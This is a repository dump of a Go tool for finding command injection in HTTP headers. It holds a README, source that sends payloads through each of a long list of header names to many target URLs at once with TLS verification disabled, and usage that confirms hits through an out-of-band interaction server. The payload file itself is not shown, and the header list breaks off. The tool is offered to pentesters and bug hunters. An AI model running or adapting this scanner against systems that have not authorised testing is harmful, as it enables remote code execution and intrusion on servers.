├── README.md ├── core └── core.go ├── go.mod ├── headers_all.txt ├── headers_common.txt ├── image ├── insprired.png └── run.png ├── main.go ├── payloads.txt └── urls.txt /README.md: -------------------------------------------------------------------------------- 1 | ## cmd-inject-header 2 | A simple tool to check command injection in headers of http request, faster with goroutines 3 | 4 | Designed to make easy check command injection in headers for bug hunter, pentester, red team-er 5 | 6 | ### Inspired by 7 | https://twitter.com/p3n73st3r/status/1556645395928866818 8 | 9 | ![https://raw.githubusercontent.com/tranquac/cmd-inject-header/master/image/insprired.png](https://raw.githubusercontent.com/tranquac/cmd-inject-header/master/image/insprired.png) 10 | ### Usage 11 | ``` 12 | Usage of cmd-inject-header: 13 | -hd string 14 | Path to list header file 15 | -it string 16 | Your interact server to check the interaction (dnslog.cn/burp collabarator/interact.sh...) 17 | -pl string 18 | Path to list payload file 19 | -se 20 | If you want send request for status code 4xx/5xx 21 | -ur string 22 | Path to list url file (URL have / in the end: http://example.com/) 23 | ``` 24 | Usage : `go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net` 25 | 26 | Usage : `go run . -hd headers_common.txt -pl payloads.txt -ur urls.txt -it xxx.burpcollaborator.net -se=true` 27 | 28 | (To send request for status code 4xx/5xx. Sometime app only vuln with this status code!) 29 | -------------------------------------------------------------------------------- /core/core.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "bufio" 5 | "crypto/tls" 6 | "fmt" 7 | "log" 8 | "net" 9 | "net/http" 10 | "os" 11 | "time" 12 | ) 13 | 14 | var httpClient = &http.Client{ 15 | Transport: transport, 16 | } 17 | 18 | var transport = &http.Transport{ 19 | TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, 20 | DialContext: (&net.Dialer{ 21 | Timeout: 30 * time.Second, 22 | KeepAlive: time.Second, 23 | DualStack: true, 24 | }).DialContext, 25 | } 26 | 27 | func ReadFromFile(filename string) []string { 28 | url_file, err := os.Open(filename) 29 | if err != nil { 30 | log.Fatal("File could not be read\n") 31 | } 32 | defer url_file.Close() 33 | uScanner := bufio.NewScanner(url_file) 34 | var urls []string 35 | for uScanner.Scan() { 36 | urls = append(urls, uScanner.Text()) 37 | } 38 | if err := uScanner.Err(); err != nil { 39 | log.Fatal(err) 40 | } 41 | return urls 42 | } 43 | 44 | func MakeRequestHeader(url string, headers, payloads []string, ch chan<- string) { 45 | chh := make(chan string) 46 | for _, header := range headers { 47 | go MakeRequestPayload(url, header, payloads, chh) // Using all payload with each header 48 | } 49 | for range headers { 50 | fmt.Println(<-chh) 51 | } 52 | ch <- fmt.Sprintf("Done Url %s", url) 53 | } 54 | 55 | func MakeRequestPayload(url, header string, payloads []string, ch chan<- string) { // Make request with each payload in payload 56 | chh := make(chan string) 57 | for _, payload := range payloads { 58 | go MakeRequestFinal(url, header, payload, chh) // Using all payload with each header 59 | } 60 | for range payloads { 61 | fmt.Println(<-chh) 62 | } 63 | ch <- fmt.Sprintf("Done Header %s", header) 64 | } 65 | 66 | func MakeRequestFinal(url, header, payload string, ch chan<- string) { 67 | start := time.Now() 68 | // resp, _ := http.Get(url) 69 | req, err := http.NewRequest("GET", url, nil) 70 | if err != nil { 71 | fmt.Println(err) 72 | } 73 | if header != "User-Agent" { 74 | req.Header.Add("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36") 75 | } 76 | req.Header.Add(header, payload) 77 | resp, err := httpClient.Do(req) 78 | if err == nil { 79 | secs := time.Since(start).Seconds() 80 | status := resp.StatusCode 81 | ch <- fmt.Sprintf("%.2f elapsed for URL: %s | StatusCode: %d | Header: %s | Payload: %s", secs, url, status, header, payload) 82 | } else { 83 | ch <- fmt.Sprintf("%v", err) 84 | } 85 | } 86 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module cmd-inject-header 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /headers_all.txt: -------------------------------------------------------------------------------- 1 | A-IM 2 | Accept 3 | Accept-Application 4 | Accept-Charset 5 | Accept-Datetime 6 | Accept-Encoding 7 | Accept-Encodxng 8 | Accept-Language 9 | Accept-Ranges 10 | Accept-Version 11 | Accepted 12 | Access-Control-Allow-Credentials 13 | Access-Control-Allow-Headers 14 | Access-Control-Allow-Methods 15 | Access-Control-Allow-Origin 16 | Access-Control-Expose-Headers 17 | Access-Control-Max-Age 18 | Access-Control-Request-Headers 19 | Access-Control-Request-Method 20 | Access-Token 21 | Accesskey 22 | Action 23 | Admin 24 | Age 25 | Ajax 26 | Akamai-Origin-Hop 27 | Allow 28 | App 29 | App-Env 30 | App-Key 31 | Appcookie 32 | Apply-To-Redirect-Ref 33 | Appname 34 | Appversion 35 | Atcept-Language 36 | Auth 37 | Auth-Any 38 | Auth-Basic 39 | Auth-Digest 40 | Auth-Digest-Ie 41 | Auth-Gssneg 42 | Auth-Key 43 | Auth-Ntlm 44 | Auth-Password 45 | Auth-Realm 46 | Auth-Type 47 | Auth-User 48 | Authentication 49 | Authorization 50 | Bad-Gateway 51 | Bad-Request 52 | Bae-Env-Addr-Bcms 53 | Bae-Env-Addr-Bcs 54 | Bae-Env-Addr-Bus 55 | Bae-Env-Addr-Channel 56 | Bae-Env-Addr-Sql-Ip 57 | Bae-Env-Addr-Sql-Port 58 | Bae-Env-Ak 59 | Bae-Env-Appid 60 | Bae-Env-Sk 61 | Bae-Logid 62 | Bar 63 | Base 64 | Base-Url 65 | Basic 66 | Bearer-Indication 67 | Body-Maxlength 68 | Body-Truncated 69 | Brief 70 | Browser-User-Agent 71 | Cache-Control 72 | Cache-Info 73 | Case-Files 74 | Catalog 75 | Catalog-Server 76 | Category 77 | Cert-Cookie 78 | Cert-Flags 79 | Cert-Issuer 80 | Cert-Keysize 81 | Cert-Secretkeysize 82 | Cert-Serialnumber 83 | Cert-Server-Issuer 84 | Cert-Server-Subject 85 | Cert-Subject 86 | Cf-Connecting-Ip 87 | Cf-Ipcountry 88 | Cf-Template-Path 89 | Cf-Visitor 90 | Ch 91 | Challenge-Response 92 | Charset 93 | Chunk-Size 94 | Client 95 | Client-Address 96 | Client-Bad-Request 97 | Client-Conflict 98 | Client-Error-Cannot-Access-Local-File 99 | Client-Error-Cannot-Connect 100 | Client-Error-Communication-Failure 101 | Client-Error-Connect 102 | Client-Error-Invalid-Parameters 103 | Client-Error-Invalid-Server-Address 104 | Client-Error-No-Error 105 | Client-Error-Protocol-Failure 106 | Client-Error-Unspecified-Error 107 | Client-Expectation-Failed 108 | Client-Forbidden 109 | Client-Gone 110 | Client-Ip 111 | Client-IP 112 | Client-Length-Required 113 | Client-Method-Not-Allowed 114 | Client-Not-Acceptable 115 | Client-Not-Found 116 | Client-Payment-Required 117 | Client-Precondition-Failed 118 | Client-Proxy-Auth-Required 119 | Client-Quirk-Mode 120 | Client-Request-Timeout 121 | Client-Request-Too-Large 122 | Client-Request-Uri-Too-Large 123 | Client-Requested-Range-Not-Possible 124 | Client-Unauthorized 125 | Client-Unsupported-Media-Type 126 | Clientaddress 127 | Clientip 128 | Cloudfront-Viewer-Country 129 | Cloudinary-Name 130 | Cloudinary-Public-Id 131 | Cloudinary-Version 132 | Cloudinaryurl 133 | Cluster-Client-IP 134 | Code 135 | Coming-From 136 | Compress 137 | Conflict 138 | Connection 139 | Connection-Type 140 | Contact 141 | Content 142 | Content-Disposition 143 | Content-Encoding 144 | Content-Language 145 | Content-Length 146 | Content-Location 147 | Content-MD5 148 | Content-Md5 149 | Content-Range 150 | Content-Security-Policy 151 | Content-Security-Policy-Report-Only 152 | Content-Type 153 | Content-Type-Xhtml 154 | Context-Path 155 | Continue 156 | Cookie 157 | Cookie-Domain 158 | Cookie-Httponly 159 | Cookie-Parse-Raw 160 | Cookie-Path 161 | Cookie-Secure 162 | Cookie-Vars 163 | Cookie2 164 | Cookies 165 | Core-Base 166 | Correlates 167 | Created 168 | Credentials-Filepath 169 | Cross-Origin-Embedder-Policy 170 | Cross-Origin-Opener-Policy 171 | Cross-Origin-Resource-Policy 172 | Curl 173 | Curl-Multithreaded 174 | Custom-Header 175 | Custom-Secret-Header 176 | Dataserviceversion 177 | Date 178 | Debug 179 | Deflate-Level-Def 180 | Deflate-Level-Max 181 | Deflate-Level-Min 182 | Deflate-Strategy-Def 183 | Deflate-Strategy-Filt 184 | Deflate-Strategy-Fixed 185 | Deflate-Strategy-Huff 186 | Deflate-Strategy-Rle 187 | Deflate-Type-Gzip 188 | Deflate-Type-Raw 189 | Deflate-Type-Zlib 190 | Delete 191 | Depth 192 | Destination 193 | Destroy 194 | Devblocksproxybase 195 | Devblocksproxyhost 196 | Devblocksproxyssl 197 | Device-Stock-Ua 198 | Digest 199 | Dir 200 | Dir-Name 201 | Dir-Resource 202 | Disable-Gzip 203 | Dkim-Signature 204 | DNT 205 | Dnt 206 | Download-Attachment 207 | Download-Bad-Url 208 | Download-Bz2 209 | Download-Cut-Short 210 | Download-E-Headers-Sent 211 | Download-E-Invalid-Archive-Type 212 | Download-E-Invalid-Content-Type 213 | Download-E-Invalid-File 214 | Download-E-Invalid-Param 215 | Download-E-Invalid-Request 216 | Download-E-Invalid-Resource 217 | Download-E-No-Ext-Mmagic 218 | Download-E-No-Ext-Zlib 219 | Download-Inline 220 | Download-Mime-Type 221 | Download-No-Server 222 | Download-Size 223 | Download-Status-Not-Found 224 | Download-Status-Server-Error 225 | Download-Status-Unauthorized 226 | Download-Status-Unknown 227 | Download-Tar 228 | Download-Tgz 229 | Download-Url 230 | Download-Zip 231 | E-Encoding 232 | E-Header 233 | E-Invalid-Param 234 | E-Malformed-Headers 235 | E-Message-Type 236 | E-Querystring 237 | E-Request 238 | E-Request-Method 239 | E-Request-Pool 240 | E-Response 241 | E-Runtime 242 | E-Socket 243 | E-Url 244 | Enable-Gzip 245 | Enable-No-Cache-Headers 246 | Encoding-Stream-Flush-Full 247 | Encoding-Stream-Flush-None 248 | Encoding-Stream-Flush-Sync 249 | Env-Silla-Environment 250 | Env-Vars 251 | Error 252 | Error-1 253 | Error-2 254 | Error-3 255 | Error-4 256 | Error-Formatting-Html 257 | Espo-Authorization 258 | Espo-Cgi-Auth 259 | Etag 260 | Eve-Charid 261 | Eve-Charname 262 | Eve-Solarsystemid 263 | Eve-Solarsystemname 264 | Eve-Trusted 265 | Ex-Copy-Movie 266 | Expect 267 | Expect-CT 268 | Expectation-Failed 269 | Expires 270 | Ext 271 | Failed-Dependency 272 | Fake-Header 273 | Fastly-Client-Ip 274 | Fb-Appid 275 | Fb-Secret 276 | Feature-Policy 277 | File-Not-Found 278 | Filename 279 | Files 280 | Files-Vars 281 | Fire-Breathing-Dragon 282 | Foo 283 | Foo-Bar 284 | Forbidden 285 | Force-Language 286 | Force-Local-Xhprof 287 | Format 288 | Forwarded 289 | Forwarded-For 290 | Forwarded-For-Ip 291 | Forwarded-Proto 292 | From 293 | Fromlink 294 | Front-End-Https 295 | Gateway-Interface 296 | Gateway-Time-Out 297 | Get 298 | Get-Vars 299 | Givenname 300 | Global-All 301 | Global-Cookie 302 | Global-Get 303 | Global-Post 304 | Gone 305 | Google-Code-Project-Hosting-Hook-Hmac 306 | Gzip-Level 307 | H0st 308 | Head 309 | Header 310 | Header-Lf 311 | Header-Status-Client-Error 312 | Header-Status-Informational 313 | Header-Status-Redirect 314 | Header-Status-Server-Error 315 | Header-Status-Successful 316 | Home 317 | Host 318 | Host-Liveserver 319 | Host-Name 320 | Host-Unavailable 321 | Hosti 322 | Htaccess 323 | Http-Accept 324 | Http-Accept-Encoding 325 | Http-Accept-Language 326 | Http-Authorization 327 | Http-Connection 328 | Http-Cookie 329 | Http-Host 330 | Http-Phone-Number 331 | Http-Referer 332 | Http-Url 333 | Http-User-Agent 334 | HTTP2-Settings 335 | Https 336 | Https-From-Lb 337 | Https-Keysize 338 | Https-Secretkeysize 339 | Https-Server-Issuer 340 | Https-Server-Subject 341 | If 342 | If-Match 343 | If-Modified-Since 344 | If-Modified-Since-Version 345 | If-None-Match 346 | If-Posted-Before 347 | If-Range 348 | If-Unmodified-Since 349 | If-Unmodified-Since-Version 350 | Image 351 | Images 352 | Incap-Client-Ip 353 | Info 354 | Info-Download-Size 355 | Info-Download-Time 356 | Info-Return-Code 357 | Info-Total-Request-Stat 358 | Info-Total-Response-Stat 359 | Insufficient-Storage 360 | Internal-Server-Error 361 | Ipresolve-Any 362 | Ipresolve-V4 363 | Ipresolve-V6 364 | Ischedule-Version 365 | Iv-Groups 366 | Iv-User 367 | Javascript 368 | Jenkins 369 | Keep-Alive 370 | Kiss-Rpc 371 | Label 372 | Large-Allocation 373 | Last-Event-Id 374 | Last-Modified 375 | Length-Required 376 | Link 377 | Local-Addr 378 | Local-Content-Sha1 379 | Local-Dir 380 | Location 381 | Lock-Token 382 | Locked 383 | Mail 384 | Mandatory 385 | Max-Conn 386 | Max-Forwards 387 | Max-Request-Size 388 | Max-Uri-Length 389 | Maxdataserviceversion 390 | Message 391 | Message-B 392 | Meth- 393 | Meth-Acl 394 | Meth-Baseline-Control 395 | Meth-Checkin 396 | Meth-Checkout 397 | Meth-Connect 398 | Meth-Copy 399 | Meth-Delete 400 | Meth-Get 401 | Meth-Head 402 | Meth-Label 403 | Meth-Lock 404 | Meth-Merge 405 | Meth-Mkactivity 406 | Meth-Mkcol 407 | Meth-Mkworkspace 408 | Meth-Move 409 | Meth-Options 410 | Meth-Post 411 | Meth-Propfind 412 | Meth-Proppatch 413 | Meth-Put 414 | Meth-Report 415 | Meth-Trace 416 | Meth-Uncheckout 417 | Meth-Unlock 418 | Meth-Update 419 | Meth-Version-Control 420 | Method 421 | Method-Not-Allowed 422 | Mimetype 423 | Mod-Env 424 | Mod-Rewrite 425 | Mod-Security-Message 426 | Modauth 427 | Mode 428 | Module-Class 429 | Module-Class-Path 430 | Module-Name 431 | Moved-Permanently 432 | Moved-Temporarily 433 | Ms-Asprotocolversion 434 | Msg-None 435 | Msg-Request 436 | Msg-Response 437 | Msisdn 438 | Multi-Status 439 | Multipart-Boundary 440 | Multiple-Choices 441 | Must 442 | My-Header 443 | Mysqlport 444 | Native-Sockets 445 | Negotiate 446 | Nl 447 | No-Content 448 | Non-Authoritative 449 | Nonce 450 | Not-Acceptable 451 | Not-Exists 452 | Not-Extended 453 | Not-Found 454 | Not-Implemented 455 | Not-Modified 456 | Notification-Template 457 | Oc-Chunked 458 | Ocs-Apirequest 459 | Ok 460 | On-Behalf-Of 461 | Onerror-Continue 462 | Onerror-Die 463 | Onerror-Return 464 | Only 465 | Opencart 466 | Options 467 | Organizer 468 | Orig_path_info 469 | Origin 470 | Origin-Isolation 471 | Originator 472 | Overwrite 473 | Params-Allow-Comma 474 | Params-Allow-Failure 475 | Params-Default 476 | Params-Get-Catid 477 | Params-Get-Currentday 478 | Params-Get-Disposition 479 | Params-Get-Downwards 480 | Params-Get-Givendate 481 | Params-Get-Lang 482 | Params-Get-Type 483 | Params-Raise-Error 484 | Partial-Content 485 | Passkey 486 | Password 487 | Path 488 | Path-Base 489 | Path-Info 490 | Path-Themes 491 | Path-Translated 492 | Payment-Required 493 | Pc-Remote-Addr 494 | Permanent 495 | Phone-Number 496 | Php 497 | Php-Auth-Pw 498 | Php-Auth-User 499 | Phpthreads 500 | Pink-Pony 501 | Port 502 | Portsensor-Auth 503 | Post 504 | Post-Error 505 | Post-Files 506 | Post-Vars 507 | Postredir-301 508 | Postredir-302 509 | Postredir-All 510 | Pragma 511 | Pragma-No-Cache 512 | Precondition-Failed 513 | Prefer 514 | Processing 515 | Profile 516 | Protocol 517 | Protocols 518 | Proxy 519 | Proxy-Agent 520 | Proxy-Authenticate 521 | Proxy-Authentication-Required 522 | Proxy-Authorization 523 | Proxy-Connection 524 | Proxy-Host 525 | Proxy-Http 526 | Proxy-Http-1-0 527 | Proxy-Password 528 | Proxy-Port 529 | Proxy-Pwd 530 | Proxy-Request-Fulluri 531 | Proxy-Socks4 532 | Proxy-Socks4a 533 | Proxy-Socks5 534 | Proxy-Socks5-Hostname 535 | Proxy-Url 536 | Proxy-User 537 | Public-Key-Pins 538 | Public-Key-Pins-Report-Only 539 | Pull 540 | Put 541 | Query-String 542 | Querystring 543 | Querystring-Type-Array 544 | Querystring-Type-Bool 545 | Querystring-Type-Float 546 | Querystring-Type-Int 547 | Querystring-Type-Object 548 | Querystring-Type-String 549 | Range 550 | Range-Not-Satisfiable 551 | Raw-Post-Data 552 | Read-State-Begin 553 | Read-State-Body 554 | Read-State-Headers 555 | Real-Ip 556 | Real-Method 557 | Reason 558 | Reason-Phrase 559 | Recipient 560 | Redirect 561 | Redirect-Found 562 | Redirect-Perm 563 | Redirect-Post 564 | Redirect-Problem-Withoutwww 565 | Redirect-Problem-Withwww 566 | Redirect-Proxy 567 | Redirect-Temp 568 | Redirected-Accept-Language 569 | Redirection-Found 570 | Redirection-Multiple-Choices 571 | Redirection-Not-Modified 572 | Redirection-Permanent 573 | Redirection-See-Other 574 | Redirection-Temporary 575 | Redirection-Unused 576 | Redirection-Use-Proxy 577 | Ref 578 | Referer 579 | Referrer 580 | Referrer-Policy 581 | Refferer 582 | Refresh 583 | Remix-Hash 584 | Remote-Addr 585 | Remote-Host 586 | Remote-Host-Wp 587 | Remote-User 588 | Remote-Userhttps 589 | Report-To 590 | Request 591 | Request-Entity-Too-Large 592 | Request-Error 593 | Request-Error-File 594 | Request-Error-Gzip-Crc 595 | Request-Error-Gzip-Data 596 | Request-Error-Gzip-Method 597 | Request-Error-Gzip-Read 598 | Request-Error-Proxy 599 | Request-Error-Redirects 600 | Request-Error-Response 601 | Request-Error-Url 602 | Request-Http-Ver-1-0 603 | Request-Http-Ver-1-1 604 | Request-Mbstring 605 | Request-Method 606 | Request-Method- 607 | Request-Method-Delete 608 | Request-Method-Get 609 | Request-Method-Head 610 | Request-Method-Options 611 | Request-Method-Post 612 | Request-Method-Put 613 | Request-Method-Trace 614 | Request-Time-Out 615 | Request-Timeout 616 | Request-Uri 617 | Request-Uri-Too-Large 618 | Request-Vars 619 | Request2-Tests-Base-Url 620 | Request2-Tests-Proxy-Host 621 | Requesttoken 622 | Reset-Content 623 | Response 624 | Rest-Key 625 | Rest-Sign 626 | Retry-After 627 | Returned-Error 628 | Rlnclientipaddr 629 | Root 630 | Safe-Ports-List 631 | Safe-Ports-Ssl-List 632 | Save-Data 633 | Schedule-Reply 634 | Scheme 635 | Script-Name 636 | Sec-Websocket-Accept 637 | Sec-Websocket-Extensions 638 | Sec-Websocket-Key 639 | Sec-Websocket-Key1 640 | Sec-Websocket-Key2 641 | Sec-Websocket-Origin 642 | Sec-Websocket-Protocol 643 | Sec-Websocket-Version 644 | Secretkey 645 | See-Other 646 | Self 647 | Send-X-Frame-Options 648 | Server 649 | Server-Bad-Gateway 650 | Server-Error 651 | Server-Gateway-Timeout 652 | Server-Internal 653 | Server-Name 654 | Server-Not-Implemented 655 | Server-Port 656 | Server-Port-Secure 657 | Server-Protocol 658 | Server-Service-Unavailable 659 | Server-Software 660 | Server-Unsupported-Version 661 | Server-Vars 662 | Server-Varsabantecart 663 | Service-Unavailable 664 | Session-Id-Tag 665 | Session-Vars 666 | Set-Cookie 667 | Set-Cookie2 668 | Shib- 669 | Shib-Application-Id 670 | Shib-Identity-Provider 671 | Shib-Logouturl 672 | Shopilex 673 | Slug 674 | Sn 675 | Soapaction 676 | Socket-Connection-Err 677 | Socketlog 678 | Somevar 679 | Sourcemap 680 | Sp-Client 681 | Sp-Host 682 | Ssl 683 | Ssl-Https 684 | Ssl-Offloaded 685 | Ssl-Session-Id 686 | Ssl-Version-Any 687 | Sslsessionid 688 | Start 689 | Status 690 | Status- 691 | Status-403 692 | Status-403-Admin-Del 693 | Status-404 694 | Status-Bad-Request 695 | Status-Code 696 | Status-Forbidden 697 | Status-Ok 698 | Status-Platform-403 699 | Str-Match 700 | Strict-Transport-Security 701 | Success-Accepted 702 | Success-Created 703 | Success-No-Content 704 | Success-Non-Authoritative 705 | Success-Ok 706 | Success-Partial-Content 707 | Success-Reset-Content 708 | Support 709 | Support-Encodings 710 | Support-Events 711 | Support-Magicmime 712 | Support-Requests 713 | Support-Sslrequests 714 | Surrogate-Capability 715 | Switching-Protocols 716 | TE 717 | Te 718 | Temporary-Redirect 719 | Test 720 | Test-Config 721 | Test-Server-Path 722 | Test-Something-Anything 723 | Ticket 724 | Time-Out 725 | Timeout 726 | Timing-Allow-Origin 727 | Title 728 | Tk 729 | Tmp 730 | Token 731 | Trailer 732 | Transfer-Encoding 733 | Translate 734 | Transport-Err 735 | True-Client-Ip 736 | True-Client-IP 737 | Ua 738 | Ua-Color 739 | Ua-Cpu 740 | Ua-Os 741 | Ua-Pixels 742 | Ua-Resolution 743 | Ua-Voice 744 | Unauthorized 745 | Unencoded-Url 746 | Unit-Test-Mode 747 | UniqueId 748 | Unless-Modified-Since 749 | Unprocessable-Entity 750 | Unsupported-Media-Type 751 | Upgrade 752 | Upgrade-Insecure-Requests 753 | Upgrade-Required 754 | Upload-Default-Chmod 755 | Uri 756 | Url 757 | Url-From-Env 758 | Url-Join-Path 759 | Url-Join-Query 760 | Url-Replace 761 | Url-Sanitize-Path 762 | Url-Strip- 763 | Url-Strip-All 764 | Url-Strip-Auth 765 | Url-Strip-Fragment 766 | Url-Strip-Pass 767 | Url-Strip-Path 768 | Url-Strip-Port 769 | Url-Strip-Query 770 | Url-Strip-User 771 | Use-Gzip 772 | Use-Proxy 773 | User 774 | User-Agent 775 | User-Agent-Via 776 | User-Email 777 | User-Id 778 | User-Mail 779 | User-Name 780 | User-Photos 781 | Useragent 782 | Useragent-Via 783 | Util 784 | Variant-Also-Varies 785 | Vary 786 | Verbose 787 | Verbose-Throttle 788 | Verify-Cert 789 | Version 790 | Version-1-0 791 | Version-1-1 792 | Version-Any 793 | Version-None 794 | Version-Not-Supported 795 | Versioncode 796 | Via 797 | Viad 798 | Waf-Stuff-Below 799 | Wap-Connection 800 | Warning 801 | Web-Server-Api 802 | Webodf-Member-Id 803 | Webodf-Session-Id 804 | Webodf-Session-Revision 805 | Work-Directory 806 | Www-Address 807 | Www-Authenticate 808 | X 809 | X- 810 | X-Aastra-Expmod1 811 | X-Aastra-Expmod2 812 | X-Aastra-Expmod3 813 | X-Accel-Mapping 814 | X-Access-Token 815 | X-Advertiser-Id 816 | X-Ajax-Real-Method 817 | X-Alto-Ajax-Keyz 818 | X-Amz-Date 819 | X-Amz-Website-Redirect-Location 820 | X-Amzn-Remapped-Host 821 | X-Api-Key 822 | X-Api-Signature 823 | X-Api-Timestamp 824 | X-Apitoken 825 | X-Apple-Client-Application 826 | X-Apple-Store-Front 827 | X-Arr-Log-Id 828 | X-Arr-Ssl 829 | X-ATT-DeviceId 830 | X-Att-Deviceid 831 | X-Auth-Key 832 | X-Auth-Mode 833 | X-Auth-Password 834 | X-Auth-Service-Provider 835 | X-Auth-Token 836 | X-Auth-User 837 | X-Auth-Userid 838 | X-Auth-Username 839 | X-Authentication 840 | X-Authentication-Key 841 | X-Authorization 842 | X-Avantgo-Screensize 843 | X-Azc-Remote-Addr 844 | X-Bear-Ajax-Request 845 | X-Bluecoat-Via 846 | X-Bolt-Phone-Ua 847 | X-Browser-Height 848 | X-Browser-Width 849 | X-Cascade 850 | X-Cept-Encoding 851 | X-Cf-Url 852 | X-Chrome-Extension 853 | X-Cisco-Bbsm-Clientip 854 | X-Client-Host 855 | X-Client-Id 856 | X-Client-Ip 857 | X-Client-IP 858 | X-Client-Key 859 | X-Client-Os 860 | X-Client-Os-Ver 861 | X-Clientip 862 | X-Cluster-Client-Ip 863 | X-Codeception-Codecoverage 864 | X-Codeception-Codecoverage-Config 865 | X-Codeception-Codecoverage-Debug 866 | X-Codeception-Codecoverage-Suite 867 | X-Collect-Coverage 868 | X-Coming-From 869 | X-Confirm-Delete 870 | X-Content-Type 871 | X-Content-Type-Options 872 | X-Correlation-ID 873 | X-Credentials-Request 874 | X-Csrf-Crumb 875 | X-Csrf-Token 876 | X-Csrftoken 877 | X-Cuid 878 | X-Custom 879 | X-Dagd-Proxy 880 | X-Davical-Testcase 881 | X-Dcmguid 882 | X-Debug-Test 883 | X-Device-User-Agent 884 | X-Download-Options 885 | X-Dialog 886 | X-Dns-Prefetch-Control 887 | X-Do-Not-Track 888 | X-Dokuwiki-Do 889 | X-Drestcg 890 | X-Dsid 891 | X-Elgg-Apikey 892 | X-Elgg-Hmac 893 | X-Elgg-Hmac-Algo 894 | X-Elgg-Nonce 895 | X-Elgg-Posthash 896 | X-Elgg-Posthash-Algo 897 | X-Elgg-Time 898 | X-Em-Uid 899 | X-Enable-Coverage 900 | X-Environment-Override 901 | X-Expected-Entity-Length 902 | X-Experience-Api-Version 903 | X-Fb-User-Remote-Addr 904 | X-File-Id 905 | X-File-Name 906 | X-File-Resume 907 | X-File-Size 908 | X-File-Type 909 | X-Filename 910 | X-Firelogger 911 | X-Fireloggerauth 912 | X-Firephp-Version 913 | X-Flash-Version 914 | X-Flx-Consumer-Key 915 | X-Flx-Consumer-Secret 916 | X-Flx-Redirect-Url 917 | X-Foo 918 | X-Foo-Bar 919 | X-Forward-For 920 | X-Forward-Proto 921 | X-Forwarded 922 | X-Forwarded-By 923 | X-Forwarded-For 924 | X-Forwarded-For-Original 925 | X-Forwarded-Host 926 | X-Forwarded-Port 927 | X-Forwarded-Proto 928 | X-Forwarded-Protocol 929 | X-Forwarded-Scheme 930 | X-Forwarded-Server 931 | X-Forwarded-Ssl 932 | X-Forwarder-For 933 | X-From 934 | X-Gb-Shared-Secret 935 | X-Geoip-Country 936 | X-Get-Checksum 937 | X-Helpscout-Event 938 | X-Helpscout-Signature 939 | X-Hgarg- 940 | X-Host 941 | X-Http-Destinationurl 942 | X-Http-Host-Override 943 | X-Http-Method 944 | X-Http-Method-Override 945 | X-Http-Path-Override 946 | X-Https 947 | X-Htx-Agent 948 | X-Huawei-Userid 949 | X-Hub-Signature 950 | X-If-Unmodified-Since 951 | X-Imbo-Test-Config 952 | X-Insight 953 | X-Ip 954 | X-Ip-Trail 955 | X-Iwproxy-Nesting 956 | X-Jphone-Color 957 | X-Jphone-Display 958 | X-Jphone-Geocode 959 | X-Jphone-Msname 960 | X-Jphone-Uid 961 | X-Json 962 | X-Kaltura-Remote-Addr 963 | X-Known-Signature 964 | X-Known-Username 965 | X-Litmus 966 | X-Litmus-Second 967 | X-Locking 968 | X-Machine 969 | X-Mandrill-Signature 970 | X-Method-Override 971 | X-Mobile-Gateway 972 | X-Mobile-Ua 973 | X-Mosso-Dt 974 | X-Moz 975 | X-Ms-Policykey 976 | X-Msisdn 977 | X-Myqee-System-Debug 978 | X-Myqee-System-Hash 979 | X-Myqee-System-Isadmin 980 | X-Myqee-System-Isrest 981 | X-Myqee-System-Pathinfo 982 | X-Myqee-System-Project 983 | X-Myqee-System-Rstr 984 | X-Myqee-System-Time 985 | X-Network-Info 986 | X-Nfsn-Https 987 | X-Ning-Request-Uri 988 | X-No-WWW-Authenticate 989 | X-Nokia-Bearer 990 | X-Nokia-Connection-Mode 991 | X-Nokia-Gateway-Id 992 | X-Nokia-Ipaddress 993 | X-Nokia-Msisdn 994 | X-Nokia-Wia-Accept-Original 995 | X-Nokia-Wtls 996 | X-Nuget-Apikey 997 | X-Oc-Mtime 998 | X-Opera-Info 999 | X-Operamini-Features 1000 | X-Operamini-Phone 1001 | X-Operamini-Phone-Ua 1002 | X-Options 1003 | X-Orange-Id 1004 | X-Orchestra-Scheme 1005 | X-Orig-Client 1006 | X-Original-Host 1007 | X-Original-Http-Command 1008 | X-Original-Remote-Addr 1009 | X-Original-Url 1010 | X-Original-User-Agent 1011 | X-Originally-Forwarded-For 1012 | X-Originally-Forwarded-Proto 1013 | X-Originating-Ip 1014 | X-Originating-IP 1015 | X-Os-Prefs 1016 | X-Overlay 1017 | X-Pagelet-Fragment 1018 | X-Password 1019 | X-Permitted-Cross-Domain-Policies 1020 | X-Phabricator-Csrf 1021 | X-Phpbb-Using-Plupload 1022 | X-Pjax 1023 | X-Pjax-Container 1024 | X-Powered-By 1025 | X-Prototype-Version 1026 | X-Proxy-Url 1027 | X-Pswd 1028 | X-Purpose 1029 | X-Qafoo-Profiler 1030 | X-Real-Ip 1031 | X-Remote-Addr 1032 | X-Remote-IP 1033 | X-Remote-Protocol 1034 | X-Render-Partial 1035 | X-Request 1036 | X-Request-ID 1037 | X-Request-Id 1038 | X-Request-Signature 1039 | X-Request-Start 1040 | X-Request-Timestamp 1041 | X-Requested-With 1042 | X-Response-Format 1043 | X-Rest-Cors 1044 | X-Rest-Password 1045 | X-Rest-Username 1046 | X-Rewrite-Url 1047 | X-Sakura-Forwarded-For 1048 | X-Scalr-Auth-Key 1049 | X-Scalr-Auth-Token 1050 | X-Scalr-Env-Id 1051 | X-Scanner 1052 | X-Scheme 1053 | X-Screen-Height 1054 | X-Screen-Width 1055 | X-Sendfile-Type 1056 | X-Serial-Number 1057 | X-Serialize 1058 | X-Server-Id 1059 | X-Server-Name 1060 | X-Server-Port 1061 | X-Signature 1062 | X-Sina-Proxyuser 1063 | X-Skyfire-Phone 1064 | X-Skyfire-Screen 1065 | X-Ssl 1066 | X-Subdomain 1067 | X-Te 1068 | X-Teamsite-Preremap 1069 | X-Test-Session-Id 1070 | X-Timer 1071 | X-Tine20-Jsonkey 1072 | X-Tine20-Request-Type 1073 | X-Tomboy-Client 1074 | X-Tor 1075 | X-Twilio-Signature 1076 | X-Ua-Device 1077 | X-Ucbrowser-Device-Ua 1078 | X-UIDH 1079 | X-Uidh 1080 | X-Unique-Id 1081 | X-Uniquewcid 1082 | X-Up-Calling-Line-Id 1083 | X-Up-Devcap-Iscolor 1084 | 